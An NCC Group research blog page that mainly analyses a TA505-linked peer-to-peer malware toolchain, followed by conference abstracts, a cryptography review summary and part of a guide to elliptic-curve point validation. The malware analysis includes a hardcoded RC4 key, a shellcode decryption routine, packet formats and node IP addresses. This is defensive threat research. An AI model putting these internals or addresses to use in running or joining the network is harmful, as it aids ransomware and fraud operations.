NCC Group Research

Tracking a P2P network related to TA505

This post is by Nikolaos Pantazopoulos and Michael Sandee

tl;dr – Executive Summary

For the past few months NCC Group has been closely tracking the operations of TA505 and the development of their various projects (e.g. Clop). During this research we encountered a number of binary files that we have attributed to the developer(s) of ‘Grace’ (i.e. FlawedGrace). These included a remote administration tool (RAT) used exclusively by TA505. The identified binary files are capable of communicating with each other through a peer-to-peer (P2P) network via UDP. While there does not appear to be a direct interaction between the identified samples and a host infected by ‘Grace’, we believe with medium to high confidence that there is a connection to the developer(s) of ‘Grace’ and the identified binaries.

In summary, we found the following:

• P2P binary files, which are downloaded along with other Necurs components (signed drivers, block lists)
• P2P binary files, which transfer certain information (records) between nodes
• Based on the network IDs of the identified samples, there seem to be at least three different networks running
• The programming style and dropped file formats match the development standards of ‘Grace’

History of TA505’s Shift to Ransomware Operations

2014: Emergence as a group

The threat actor, often referred to as TA505 publicly, has been distinguished as an independent threat actor by NCC Group since 2014. Internally we used the name “Dridex RAT group”. Initially it was a group that integrated quite closely with EvilCorp, utilising their Dridex banking malware platform to execute relatively advanced attacks, often using custom-made tools built for a single purpose and repurposing commonly available tools such as ‘Ammyy Admin’ and ‘RMS’/’RUT’ to complement their arsenal. The attacks mostly consisted of compromising organisations and social engineering victims into executing high-value bank transfers to corporate mule accounts. These operations included social engineering their way past correctly implemented two-factor authentication with dual authorisation by both the creator of a transaction and the person authorising it.

2017: Evolution

In late 2017, EvilCorp and TA505 (Dridex RAT Group) ended their partnership. Our hypothesis is that EvilCorp had started to use the Bitpaymer ransomware to extort organisations rather than committing banking fraud. This built on the fact that they had previously been using the Locky ransomware, which was attracting unwanted attention. EvilCorp’s ability to execute enterprise ransomware across large-scale businesses was first demonstrated in May 2017. Their capability and success at pulling off such attacks stemmed from numerous years of experience in compromising corporate networks for banking fraud, specifically moving laterally to separate hosts controlled by employees who had the required access to and control of corporate bank accounts. The same lateral movement techniques and tools (such as Empire, Armitage, Cobalt Strike and Metasploit) enabled EvilCorp to become highly effective in targeted ransomware attacks.

However, in 2017 TA505 went their own way and, specifically in 2018, executed a large number of attacks using the tool called ‘Grace’, also known publicly as ‘FlawedGrace’ and ‘GraceWire’. The victims were mostly financial institutions, and a large number of them were located in Africa, South Asia, and South East Asia, with confirmed fraudulent wire transactions and card data theft originating from victims of TA505. ‘Grace’ had some interesting features and showed some indications that it was originally designed as banking malware which had later been repurposed. Nevertheless, the tool was developed and used against hundreds of victims worldwide, while remaining relatively unknown to the wider public in its first years of use.

2019: Clop and wider tooling

In early 2019, TA505 started to utilise the Clop ransomware, alongside other tools such as ‘SDBBot’ and ‘ServHelper’, while continuing to use ‘Grace’ up to and including 2021. Today it appears that the group has realised the potential of ransomware operations as a viable business model and the relative ease with which they can extort large sums of money from victims.

The remainder of this post dives deeper into a tool discovered by NCC Group that we believe is related to TA505 and the developer of ‘Grace’. We assess that the identified tool is part of a bigger network, possibly related to Grace infections.

Technical Analysis

The technical analysis we provide below focuses on three components of the execution chain:

1. A downloader – Runs as a service (each identified variant has a different name) and downloads the rest of the components along with a list of target processes/services that the driver uses while filtering information. Necurs has used similar downloaders in the past.
2. A signed driver (both x86 and x64 available) – Filters processes/services in order to avoid detection and/or prevent removal. In addition, it injects the payload into a new process.
3. Node tool – Communicates with other nodes in order to transfer victim’s data.

It should be noted that for all above components, different variations were identified. However, the core functionality and purposes remain the same.

Upon execution, the downloader generates a GUID (used as a bot ID) and stores it in the ProgramData folder under the filename regid.1991-06.com.microsoft.dat. Any downloaded file is stored temporarily in this directory. In addition, the downloader reads the version of crypt32.dll in order to determine the version of the operating system.

Next, it contacts the command and control server and downloads the following files:

• t.dat – Expected to contain the string ‘kwREgu73245Nwg7842h’
• p3.dat – P2P Binary. Saved as ‘payload.dll’
• d1c.dat – x86 (signed) Driver
• d2c.dat – x64 (signed) Driver
• bn.dat – List of processes for the driver to filter. Stored as ‘blacknames.txt’
• bs.dat – List of service names for the driver to filter. Stored as ‘blacksigns.txt’
• bv.dat – List of file version names for the driver to filter. Stored as ‘blackvers.txt’
• r.dat – List of registry keys for the driver to filter. Stored as ‘registry.txt’

The network communication of the downloader is simple. Firstly, it sends a GET request to the command and control server, downloads the appropriate component and saves it to disk. Then, it reads the component from disk and decrypts it (using the RC4 algorithm) with the hardcoded key ‘ABCDF343fderfds21’. After decrypting it, the downloader deletes the file.
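The decryption step can be sketched as follows. This is a minimal illustration, assuming the downloader uses unmodified RC4 and that the hardcoded key is used as its raw ASCII bytes; the function name `rc4`, the constant name and the sample plaintext are ours and do not come from the sample.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4. Encryption and decryption are the same operation."""
    # Key-scheduling algorithm (KSA)
    state = list(range(256))
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % len(key)]) % 256
        state[i], state[j] = state[j], state[i]

    # Pseudo-random generation algorithm (PRGA), XORed over the data
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i], state[j] = state[j], state[i]
        out.append(byte ^ state[(state[i] + state[j]) % 256])
    return bytes(out)


# Hardcoded key reported above, assumed to be used as raw ASCII bytes.
DOWNLOADER_KEY = b"ABCDF343fderfds21"

# Round trip on made-up data (not a real component).
blob = rc4(DOWNLOADER_KEY, b"example component")
recovered = rc4(DOWNLOADER_KEY, blob)
```

Because RC4 is symmetric, the same function can be applied to a component captured from disk before the downloader deletes it, provided the assumptions above hold.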

Depending on the component type, the downloader stores each of them differently. Any configurations (e.g. list of processes to filter) are stored in registry under the key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID with the value name being the thread ID of the downloader. The data are stored in plaintext with a unique ID value at the start (e.g. 0x20 for the processes list), which is used later by the driver as a communication method.

In addition, in one variant, we detected a reporting mechanism to the command and control server for each step taken. This involves sending a GET request, which includes the generated bot ID along with a status code. The below table summarises each identified request (Table 1).

Driver Analysis

The downloaded driver is the same one that Necurs uses. It has already been analysed publicly [1] but, in summary, it does the following.

In the first stage, the driver decrypts shellcode, copies it to a new allocated pool and then executes the payload. Next, the shellcode decrypts and runs (in memory) another driver (stored encrypted in the original file). The decryption algorithm remains the same in both cases:

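def _rol(value, bits, width):
    # Rotate a width-bit integer left by the given number of bits
    return ((value << bits) | (value >> (width - bits))) & ((1 << width) - 1)

def decrypt(encrypted, xor_key, bits=15):
    # xor_key is the 32-bit key extracted from the sample; len(encrypted) is assumed to be a multiple of 4
    result = b''
    for i in range(0, len(encrypted), 4):
        value = int.from_bytes(encrypted[i:i+4], 'little') ^ xor_key
        result += (_rol(value, bits, 32) ^ xor_key).to_bytes(4, 'little')
    return result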


Eventually, the decrypted driver injects the payload (the P2P binary) into a new process (‘wmiprvse.exe’) and proceeds with the filtering of data.

A notable piece of code of the driver is the strings’ decryption routine, which is also present in recent GraceRAT samples, including the same XOR key (1220A51676E779BD877CBECAC4B9B8696D1A93F32B743A3E6790E40D745693DE58B1DD17F65988BEFE1D6C62D5416B25BB78EF0622B5F8214C6B34E807BAF9AA).

The identified sample is written in C++ and interacts with other nodes in the network using UDP. We believe that the downloaded binary file is related to TA505 for (at least) the following reasons:

1. Same serialisation library
2. Same programming style as ‘Grace’ samples
3. Similar naming convention for the configuration keys to that of ‘Grace’ samples
4. Same output files (dsx), which we have seen in previous TA505 compromises. DSX files have been used by ‘Grace’ operators to store information related to compromised machines.

Initialisation Phase

In the initialisation phase, the sample ensures that the configurations have been loaded and the appropriate folders are created.

All identified samples store their configurations in a resource with name XC.

ANALYST NOTE: Due to limited visibility of other nodes, we were not able to identify the purpose of each configuration key.

The first configuration stores the following settings:

• cx – Parent name
• nid – Node ID. This is used as a network identification method during network communication. If the incoming network packet does not have the same ID then the packet is treated as a packet from a different network and is ignored.
• dgx – Unknown
• exe – Binary mode flag (DLL/EXE)
• key – RSA key to use for verifying a record
• port – UDP port to listen on
• va – Parent name. It includes the node IPs to contact.

The second configuration contains the following settings (or metadata as the developer names them):

• meta – Parent name
• app – Unknown. Probably specifies the variant type of the server. The following values seem to be supported: target (the currently set value), gate, drop, control
• mod – Specifies if current binary is the core module.
• bld – Unknown
• api – Unknown
• llr – Unknown
• llt – Unknown

Next, the sample creates a set of folders and files in a directory named ‘target’. These folders are:

• node (folder) – Stores records of other nodes
• trash (folder) – Holds files that have been moved for deletion
• units (folder) – Unknown. Appears to contain PE files, which the core module loads.
• sessions (folder) – Active nodes’ sessions
• units.dsx (file) – List of ‘units’ to load
• probes.dsx (file) – Stores the connected nodes IPs along with other metadata (e.g. connection timestamp, port number)
• net.dsx (file) – Node peer name

Network communication

After the initialisation phase has been completed, the sample starts sending UDP requests to a list of IPs in order to register itself into the network and then exchange information.

Every network packet has a header, which has the below structure:

struct Node_Network_Packet_Header
{
    BYTE XOR_Key;
    BYTE Version;               // Set to 0x37 ('7')
    BYTE Encrypted_node_ID[16]; // XORed with XOR_Key above
    BYTE Peer_Name[16];         // XORed with XOR_Key above. Connected peer name
    BYTE Command_ID;            // Internally called frame type
    DWORD Watermark;            // XORed with XOR_Key above
    DWORD Crc32_Data;           // CRC32 of above data
};
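To make the layout concrete, the header can be packed and parsed as in the sketch below. Several details are assumptions on our part and are not confirmed by the analysis above: that the structure is packed with no padding (43 bytes), that multi-byte fields are little-endian, that the single-byte XOR key is applied to every byte of the XORed fields, and that the checksum is a standard CRC32 over the preceding 39 bytes as transmitted. The function names are hypothetical.

```python
import struct
import zlib

# Assumed wire layout: packed, little-endian, 43 bytes in total.
HEADER = struct.Struct("<BB16s16sB4sI")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (assumed scheme)."""
    return bytes(b ^ key for b in data)


def build_header(xor_key, node_id, peer_name, command_id, watermark, version=0x37):
    body = struct.pack(
        "<BB16s16sB4s",
        xor_key,
        version,
        xor_bytes(node_id, xor_key),
        xor_bytes(peer_name, xor_key),
        command_id,
        xor_bytes(watermark.to_bytes(4, "little"), xor_key),
    )
    # Assumption: CRC32 covers every header byte that precedes it.
    return body + struct.pack("<I", zlib.crc32(body))


def parse_header(raw: bytes) -> dict:
    if len(raw) < HEADER.size:
        raise ValueError("truncated header")
    xor_key, version, nid, peer, cmd, wm, crc = HEADER.unpack_from(raw)
    return {
        "version": version,
        "node_id": xor_bytes(nid, xor_key),
        "peer_name": xor_bytes(peer, xor_key),
        "command_id": cmd,
        "watermark": int.from_bytes(xor_bytes(wm, xor_key), "little"),
        "crc_ok": crc == zlib.crc32(raw[: HEADER.size - 4]),
    }


# Made-up values, for illustration only.
hdr = build_header(0x5A, bytes(range(16)), b"P" * 16, 1, 0xDEADBEEF)
parsed = parse_header(hdr)
```

A receiver following the behaviour described for ‘nid’ would compare `parsed["node_id"]` with its own network ID and drop the packet on a mismatch.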


When the sample requires adding additional information in a network packet, it uses the below structure:

struct Node_Network_Packet_Payload
{
    DWORD Size;
    DWORD CRC32_Data;
    BYTE Data[Size]; // XORed with the same key used in the packet header (XOR_Key)
};
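A sketch of how such a payload could be framed and validated follows. The byte order (little-endian) and the choice to compute the CRC32 over the XORed bytes as transmitted are assumptions; the analysis above does not state which form of the data the checksum covers. The function names are hypothetical.

```python
import struct
import zlib


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (assumed scheme)."""
    return bytes(b ^ key for b in data)


def build_payload(data: bytes, xor_key: int) -> bytes:
    encoded = xor_bytes(data, xor_key)
    # Assumption: the checksum is taken over the bytes as sent on the wire.
    return struct.pack("<II", len(encoded), zlib.crc32(encoded)) + encoded


def parse_payload(raw: bytes, xor_key: int) -> bytes:
    if len(raw) < 8:
        raise ValueError("truncated payload header")
    size, crc = struct.unpack_from("<II", raw)
    encoded = raw[8 : 8 + size]
    if len(encoded) != size:
        raise ValueError("payload shorter than declared size")
    if zlib.crc32(encoded) != crc:
        raise ValueError("CRC32 mismatch")
    return xor_bytes(encoded, xor_key)


# Made-up data, for illustration only.
frame = build_payload(b"record data", 0x5A)
decoded = parse_payload(frame, 0x5A)
```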

As expected, each network command (Table 2) adds a different set of information in the ‘Data’ field of the above structure but most of the commands follow a similar format. For example, an ‘invitation’ request (Command ID 1) has the structure:

struct Node_Network_Invitation_Packet
{
    BYTE CMD_ID;
    DWORD Session_Label;
    BYTE Invitation_ID[16];
    BYTE Node_Peer_Name[16];
    WORD Node_Binded_Port;
};

The sample supports a limited set of commands, whose primary role is to exchange ‘records’ between nodes.

ANALYST NOTE: When information, such as record IDs or number of active connections/records, is sent, the binary adds the length of the data followed by the actual data. For example, in case of sending number of active connections and records:

01 05 01 02 01 02

The above is translated as:

2 active connections from a total of 5 with 2 records.
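The example above can be decoded with a small length-prefixed parser. This sketch assumes a one-byte length prefix and little-endian values (the byte order is irrelevant for the one-byte values shown); the function name is hypothetical.

```python
def parse_length_prefixed(buf: bytes) -> list:
    """Decode a run of <length><value> fields into integers."""
    values = []
    pos = 0
    while pos < len(buf):
        length = buf[pos]  # assumed: one-byte length prefix
        pos += 1
        chunk = buf[pos : pos + length]
        if len(chunk) != length:
            raise ValueError("truncated field")
        values.append(int.from_bytes(chunk, "little"))
        pos += length
    return values


# Bytes from the example above: total connections, active connections, records.
total, active, records = parse_length_prefixed(bytes.fromhex("010501020102"))
```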

Moreover, when a node receives a request, it sends an echo reply (includes the same packet header) to acknowledge that the request was read. In general, the following types are supported:

• Request type of 0x10 for echo request.
• Request type of 0x07 when sending data, which fit in one packet.
• Request type of 0x0D when sending data in multiple packets (size of payload over 1419 bytes).
• Request type of 0x21. It exists in the binary but is not supported during network communication.

Record files

As mentioned already, a record has its own sub-folder under the ‘node’ folder with each sub-folder containing the below files:

• m – Metadata of record file
• l – Unknown purpose
• p – Payload of the record

The metadata file contains a set of information about the record, such as the node peer name and the node network ID. Among this information, the keys ‘tag’ and ‘pwd’ appear to be particularly important. The ‘tag’ key represents a command (different from the set in Table 2) that the node will execute once it receives the record. Currently, the binary only supports the command ‘updates’. The payload file (p) keeps the updated content encrypted, with the value of the key ‘pwd’ being the AES key.

Even though we have not yet been able to capture any network traffic for the above command, we believe that it is used to update the currently running core module.

IoCs

Nodes’ IPs

45.142.213[.]139:555

195.123.246[.]14:555

45.129.137[.]237:33964

78.128.112[.]139:33964

145.239.85[.]6:3333

References


Conference Talks – December 2021

This month, members of NCC Group will be presenting their work at the following conferences:

• Matt Lewis (NCC Group) & Mark McFadden, “Show me the numbers: Workshop on Analyzing IETF Data (AID)”, to be presented at the IETF Internet Architecture Board Workshop on Analyzing IETF Data 2021 (November 29 – December 1 2021)
• Michael Gough, “ARTHIR: ATT&CK Remote Threat Hunting Incident Response Windows Tool”, to be presented at Open Source Digital Forensics Conference (December 1 2021)
• Juan Garrido, “From Hero to Zero. Hardening Microsoft 365 services”, to be presented at STIC – CCN-CERT (December 3 2021)
• Jennifer Fernick, “Financial Post-Quantum Cryptography in Production: A CISO’s Guide”, to be presented at FS-ISAC (December 21 2021)

Show me the numbers: Workshop on Analyzing IETF Data (AID)
Matt Lewis (NCC Group) & Mark McFadden
IETF Internet Architecture Board Workshop on Analyzing IETF Data 2021
November 29 – December 1 2021

RFCs have played a pivotal role in helping to formalise ideas and requirements for much of the Internet’s design and engineering. They have facilitated peer review amongst engineers, researchers and computer scientists, which in turn has resulted in specification of key Internet protocols and their behaviours so that developers can implement those protocols in products and services, with a degree of certainty around correctness in design and interoperability between different implementations. Security considerations within RFCs were not present from the outset, but rather evolved over time as the Internet grew in size and complexity, and as our understanding of security concepts and best practices matured. Arguably, security requirements across the corpus of RFCs (over 8,900 at the time of writing) have been inconsistent, which perhaps attests to how and when we often see security vulnerabilities manifest themselves, both in protocol design and in subsequent implementation.

In early 2021, Research Director Matt Lewis of NCC Group (global cyber security and risk mitigation specialists) released research exploring properties of RFCs in terms of security, which included analyses of how security is (or isn’t) prescribed within RFCs. This was done in order to help understand how and why security vulnerabilities manifest themselves from design to implementation. The research parsed RFCs, extracting RFC data and metadata into graph databases to explore and query relationships between different properties of RFCs. The ultimate aim of the research was to use any key observations and insights to stimulate further thought and discussion on how and where security improvements could be made to the RFC process, allowing for maximised security assurance at protocol specification and design so as to facilitate security and defence-in-depth. The research showed the value of mining large volumes of data for the purpose of gaining useful insights, and the value of techniques such as graph databases to help cut through the complexities involved with processing and interpreting large volumes of data.

Following publication of NCC Group’s research, other interested parties read it and identified commonalities with research performed by Mark McFadden (of Internet Policy Advisors LTD), an expert on the development of global internet addressing standards and policies, and an active contributor to work in the IETF and ICANN. Mark had very similar research goals to NCC Group, and in that endeavour he had performed analysis around RFC3552 (Guidelines for Writing RFC Text on Security Considerations). RFC3552 provides guidance to authors in crafting RFC text on Security Considerations. Mark noted that the RFC is more than fifteen years old and, with the threat landscape and security ecosystem significantly changed since the RFC was published, RFC3552 is a candidate for update. Mark authored an internet draft proposing that, prior to drafting an update to RFC3552, an examination of recent, published Security Considerations sections be carried out as a baseline for how to improve RFC3552. His draft suggested a methodology for examining Security Considerations sections in published RFCs and the extraction of both quantitative and qualitative information that could inform a revision of the older guidance. It also reported on an experiment involving textual analysis of sixteen years of RFC Security Considerations sections.

Matt and Mark are thus very much aligned on this topic, and between their respective approaches, have already gone some way in seeking to baseline how RFC Security Considerations should be expressed and improved. They are therefore seeking to collaborate further on this topic, which will include even further analysis of empirical evidence that exists within the vast bodies of IETF data. Matt and Mark would welcome participation at the forthcoming workshop on analysing IETF Data (AID), 2021. We propose active contribution by way of presentation of our existing research and insights, and would welcome community engagement and discussion on the topic so as to understand how we can utilise the IETF data for the baselining and improvement of security requirement specification within the RFC process.

ARTHIR: ATT&CK Remote Threat Hunting Incident Response Windows Tool
Michael Gough
Open Source Digital Forensics Conference
December 1 2021

ArTHIR is a modular framework that can be used remotely against one or many target systems to perform threat hunting, incident response, compromise assessments, configuration, containment, and any other activities you can conjure up utilizing built-in PowerShell (any version) and Windows Remote Management (WinRM).

This is an improvement to the well-known tool Kansa, but with more capabilities than just running PowerShell scripts. ArTHIR makes it easier to push and execute any binary remotely and retrieve back the output!

One goal of ArTHIR is for you to map your threat hunting and incident response modules to the MITRE ATT&CK Framework. Map your modules to one or more tactics and technique IDs and fill in your MITRE ATT&CK Matrix on your capabilities, and gaps needing improvement.

Have an idea for a module? Have a utility you want to run remotely but no easy way to do it at volume? ArTHIR provides you with this capability. As an open source project hosted on GitHub, everyone is encouraged to contribute and build modules, share ideas, and request updates. There is even a Slack page to ask questions, share ideas, and collaborate.

Included in ArTHIR are all the original Kansa modules, and several LOG-MD free edition modules. Also included is a template of some key items you will need to build your own PowerShell or utility modules.

From Hero to Zero. Hardening Microsoft 365 services
Juan Garrido
STIC – CCN-CERT
December 3 2021

In this talk, Juan will describe and demonstrate multiple techniques for bypassing existing Office 365 application security controls, showing how data can be exfiltrated from highly secure Office 365 tenants which employ strict security policies, such as Network-Location or Conditional Access Policies, which are used to control access to cloud applications.

Juan will also introduce a new PowerShell module that will help IT security administrators to better prevent, respond and react to bad actors in Microsoft 365 tenants.

Financial Post-Quantum Cryptography in Production: A CISO’s Guide
Jennifer Fernick
FS-ISAC
December 21 2021

Security leaders have to constantly filter signal from noise about emerging threats, including security risks associated with novel emerging technologies like quantum computing. In this presentation, we will explore post-quantum cryptography specifically through the lens of upgrading financial institutions’ cryptographic infrastructure.

We’re going to take a different approach to most post-quantum presentations, by not discussing quantum mechanics or why quantum computing is a threat, and instead starting from the known fact that most of the public-key cryptography on the internet will be trivially broken by existing quantum algorithms, and cover strategic applied security topics to address this need for a cryptographic upgrade, such as:

• Financial services use cases for cryptography and quantum-resistance, and context-specific nuances in computing environments such as mainframes, HSMs, public cloud, CI/CD pipelines, third-party and multi-party financial protocols, customer-facing systems, and more
• Whether quantum technologies like QKD are necessary to achieve quantum-resistant security
• Post-quantum cryptographic algorithms for digital signatures, key distribution, and encryption
• How much confidence cryptanalysts currently have in the quantum-resistance of those ciphers, and what this may mean for cryptography standards over time
• Deciding when to begin integrating PQC in a world of competing technology standards
• Designing extensible cryptographic architectures
• Actions financial institutions’ cryptography teams can take immediately

This presentation is rooted in both research and practice, is entirely vendor- and product-agnostic, and will be easily accessible to non-cryptographers, helping security leaders think through the practical challenges and tradeoffs when deploying quantum-resistant technologies.


Public Report – Zendoo Proof Verifier Cryptography Review

During the summer of 2021, Horizen Labs engaged NCC Group to conduct a cryptography review of Zendoo protocol’s proof verifier. This system generates and verifies modified Marlin proofs with a polynomial commitment scheme based on the hardness of the discrete logarithm problem in prime-order groups. The system also provides optimized batch verification of accumulated proofs. The review included a large number of supporting elements for the proof system, such as the underlying field arithmetic, instantiations of specific elliptic curves, a custom hash function, and optimized Merkle Tree implementations. NCC Group assigned three consultants for a total of 42 person-days over the course of five calendar weeks on this review. Following this review, NCC Group performed a retest of the findings uncovered during the initial engagement a few weeks later.


An Illustrated Guide to Elliptic Curve Cryptography Validation

Elliptic Curve Cryptography (ECC) has become the de facto standard for protecting modern communications. ECC is widely used to perform asymmetric cryptography operations, such as to establish shared secrets or for digital signatures. However, insufficient validation of public keys and parameters is still a frequent cause of confusion, leading to serious vulnerabilities, such as leakage of secret keys, signature malleability or interoperability issues.

The purpose of this blog post is to provide an illustrated description of the typical failures related to elliptic curve validation and how to avoid them in a clear and accessible way. Even though a number of standards1,2 mandate these checks, implementations frequently fail to perform them.

While this blog post describes some of the necessary concepts behind elliptic curve arithmetic and cryptographic protocols, it does not cover elliptic curve cryptography in detail, which has already been done extensively. The following blog posts are good resources on the topic: A (Relatively Easy To Understand) Primer on Elliptic Curve Cryptography by Nick Sullivan and Elliptic Curve Cryptography: a gentle introduction by Andrea Corbellini.

In elliptic curve cryptography, public keys are frequently sent between parties, for example to establish shared secrets using Elliptic curve Diffie–Hellman (ECDH). The goal of public key validation is to ensure that keys are legitimate (by providing assurance that there is an existing, associated private key) and to circumvent attacks leading to the leakage of some information about the private key of a legitimate user.

Issues related to public key validation seem to routinely occur in two general areas. First, transmitting public keys using digital communication requires converting them to bytes. However, converting these bytes back to an elliptic curve point is a common source of issues, notably due to canonicalization. Second, once public keys have been decoded, some mathematical subtleties of the elliptic curve operations may also lead to different types of attacks. We will discuss these subtleties in the remainder of this blog post.

TL;DR

In general3, vulnerabilities may arise when applications fail to check that:

1. The point coordinates are lower than the field modulus.
2. The coordinates correspond to a valid curve point.
3. The point is not the point at infinity.
4. The point is in the correct subgroup.

An Illustrated Guide to Validating ECC Curve Points

Elliptic curves are curves given by an equation of the form $y^2 = x^3 + ax + b$ (called short Weierstrass form). Elliptic curve cryptography deals with the group of points on that elliptic curve, namely, a set of $(x, y)$ values satisfying the curve equation.

These values, called coordinates (more specifically, affine coordinates), are defined over a field. For use in cryptography, we work with coordinates defined over a finite field. For the purpose of this blog post, we will concentrate our efforts on the field of integers modulo $p$, with $p$ a prime number (and $p > 3$), which we call the field modulus. Elements of this field can take any value between $0$ and $p - 1$. In the following figure, the white squares depict valid field elements while grey squares represent the elements that are larger than the field modulus.

Mathematically, a value larger than the field modulus is equivalent to its reduced form (that is, in the $0$ to $p-1$ range, see congruence classes), but in practice these ambiguities may lead to complex issues4.

In ECC, a public key is simply a point on the curve. Since curve points are generally first encoded to byte arrays before being transmitted, the first step when receiving an encoded curve point is to decode it. This is what we identified earlier as the first area of confusion and potential source of vulnerabilities. Specifically, what happens when the integer representations of the coordinates we decoded are larger than the field modulus?

This is the first common source of issues and the reason for our first validation rule:

Check that the point coordinates are lower than the field modulus.

What can go wrong? If the recipient does not enforce that coordinates are lower than the field modulus, some elliptic curve point operations may be incorrectly computed. Additionally, different implementations may have diverging interpretations of the validity of a point, possibly leading to interoperability issues, which can be a critical issue in consensus-driven deployments.

In the figure below, this means that the point coordinates should be rejected if they are not in the white area in the bi-dimensional plane.
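As a minimal sketch of this first rule, the snippet below decodes a big-endian coordinate and rejects any value that is not a canonical field element. The toy modulus $p = 23$ and the function name are assumptions chosen for illustration; real curves use moduli of 256 bits or more.

```python
P = 23  # toy field modulus, for illustration only


def decode_coordinate(raw: bytes, p: int = P) -> int:
    """Decode a big-endian coordinate, rejecting non-canonical values."""
    value = int.from_bytes(raw, "big")
    if value >= p:
        # 26 and 3 are congruent modulo 23, but only 3 is a valid encoding.
        raise ValueError("coordinate is not lower than the field modulus")
    return value


canonical = decode_coordinate(b"\x03")  # accepted
try:
    decode_coordinate(b"\x1a")  # 26 = 3 + 23: same residue, rejected
    rejected = False
except ValueError:
    rejected = True
```

Rejecting the non-canonical form, instead of silently reducing it, is what keeps two implementations from disagreeing on whether a given byte string is a valid point.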

Since both coordinates are elements of this finite field, it might seem that an elliptic curve point could theoretically take any value in the white area above. However, not all pairs of $(x, y)$ values in this plane are valid curve points; remember that they need to satisfy the curve equation $y^2 = x^3 + ax + b$ in order to be on the curve. We represent the valid curve points in blue in the figure below5. The number of points on the curve is referred to as the curve order.

This is another common source of issues and where our second validation rule arises:

Check that the point coordinates correspond to a valid curve point (i.e. that the coordinates satisfy the curve equation).

What can go wrong? If the recipient of a public key fails to verify that the point is on the curve, an attacker may be able to perform a so-called invalid curve attack6. Some point operations being independent of the value of $b$ in the elliptic curve equation, a malicious peer may carefully select a different curve (by varying the value of $b$) in which the security is reduced (namely, the discrete logarithm problem is easier than on the original curve). By then sending a point on that new curve (and provided the legitimate peer fails to verify that the point coordinates satisfy the curve equation), the attacker may eventually recover the legitimate peer’s secret.
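The second rule can be sketched in a few lines. The toy curve $y^2 = x^3 + x + 1$ over the integers modulo $23$ is our choice for illustration, as is the function name. The point $(2, 1)$ stands in for an attacker-chosen point: it does not satisfy the expected equation but does lie on the curve obtained by changing $b$ to $14$.

```python
P, A, B = 23, 1, 1  # toy curve y^2 = x^3 + x + 1 over F_23, for illustration only


def is_on_curve(x: int, y: int, p: int = P, a: int = A, b: int = B) -> bool:
    """Check the range of both coordinates, then the curve equation."""
    if not (0 <= x < p and 0 <= y < p):
        return False
    return (y * y - (x**3 + a * x + b)) % p == 0


honest_point = (3, 10)  # 10^2 = 8 and 3^3 + 3 + 1 = 8 (mod 23)
rogue_point = (2, 1)    # lies on y^2 = x^3 + x + 14 instead

accepted = is_on_curve(*honest_point)
rejected = not is_on_curve(*rogue_point)
on_other_curve = is_on_curve(*rogue_point, b=14)
```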

In practice, curve points are rarely sent as pairs of coordinates, which we call uncompressed. Indeed, the $y$-coordinate can be recovered by solving the curve equation for a given $x$, which is why point compression was developed. Point compression reduces the amount of data to be transmitted by (almost) half, at the cost of a few more operations necessary to solve the curve equation. However, solving the equation for a given $x$ may have different outcomes. It can either result in:

• no solutions (in case $y^2$ does not have a square root in the field, i.e. is not a quadratic residue), in which case the point should be rejected; or
• two solutions, $(x, y)$ and $(x, -y)$, due to the fact that $y^2 = (-y)^2$. However, all coordinates must lie in the $0 \ldots p-1$ range, which are all positive numbers. Since we’re working in the field of integers modulo $p$, that negative $y$-coordinate is actually equivalent to the field element $p - y$, which lies in the correct range.

Hence, when compressing a point, an additional byte of data is used to distinguish the correct $y$-coordinate. Specifically, point encoding (following Section 2.3.3 of SEC 1) works by prepending a byte to the coordinate(s) specifying which encoding rule is used, as follows:

• Compressed point: 0x02 || x if y is even and 0x03 || x if y is odd;
• Uncompressed point: 0x04 || x || y.7

Any other value for the first byte should result in the curve point being ignored. Point compression has a significant benefit in that it ensures that the point is on the curve, since implementations should reject the point when the equation has no solution.
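The decoding rules above can be sketched as follows. This is an illustration on a toy curve ($y^2 = x^3 + x + 1$ modulo $23$), not a production decoder: the function name is hypothetical, the square root shortcut only works because $23 \equiv 3 \pmod 4$, and the point at infinity is deliberately not handled here.

```python
P, A, B = 23, 1, 1                      # toy curve, for illustration only
COORD_LEN = (P.bit_length() + 7) // 8   # bytes per coordinate (1 here)


def decode_point(data: bytes):
    """Decode a compressed (0x02/0x03) or uncompressed (0x04) point."""
    if not data:
        raise ValueError("empty encoding")
    prefix, body = data[0], data[1:]

    if prefix in (0x02, 0x03):
        if len(body) != COORD_LEN:
            raise ValueError("wrong length for a compressed point")
        x = int.from_bytes(body, "big")
        if x >= P:
            raise ValueError("x is not lower than the field modulus")
        rhs = (x**3 + A * x + B) % P
        y = pow(rhs, (P + 1) // 4, P)   # square root, valid since P % 4 == 3
        if (y * y) % P != rhs:
            raise ValueError("no solution: x is not on the curve")
        if (y % 2) != (prefix & 1):
            y = (P - y) % P             # pick the other root
        if (y % 2) != (prefix & 1):
            raise ValueError("parity byte matches no root")
        return x, y

    if prefix == 0x04:
        if len(body) != 2 * COORD_LEN:
            raise ValueError("wrong length for an uncompressed point")
        x = int.from_bytes(body[:COORD_LEN], "big")
        y = int.from_bytes(body[COORD_LEN:], "big")
        if x >= P or y >= P:
            raise ValueError("coordinate is not lower than the field modulus")
        if (y * y - (x**3 + A * x + B)) % P != 0:
            raise ValueError("point is not on the curve")
        return x, y

    raise ValueError("unsupported encoding prefix")


even_root = decode_point(bytes([0x02, 3]))
odd_root = decode_point(bytes([0x03, 3]))
```

Note that the uncompressed branch needs the explicit curve equation check, whereas the compressed branch gets it as a by-product of solving for $y$.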

Now, the careful reader may have realized that the set of points in the figure above is incomplete. In order for this set to form a group (in the mathematical sense), and be useful in cryptography, it needs to be supplemented with an additional element, the point at infinity. This point, also called neutral element or additive identity, is the element $\mathcal{O}$ such that for any point $P$ on our elliptic curve, $P + \mathcal{O} = \mathcal{O} + P = P$. The figure below shows the previous set of points on our arbitrary curve with the addition of the point at infinity, which we (artificially) positioned slightly outside our plane, in the bottom left corner.

Since the point at infinity is not on the curve, it does not have well-defined $x$ and $y$ coordinates like other curve points. As such, its representation had to be constructed artificially[8]. Standards (such as SEC 1: Elliptic Curve Cryptography) define the encoding of the point at infinity to be a single octet of value zero. Confusingly, implementations sometimes also use other encodings for the point at infinity, such as a number of zero bytes equal to the size of the coordinates.

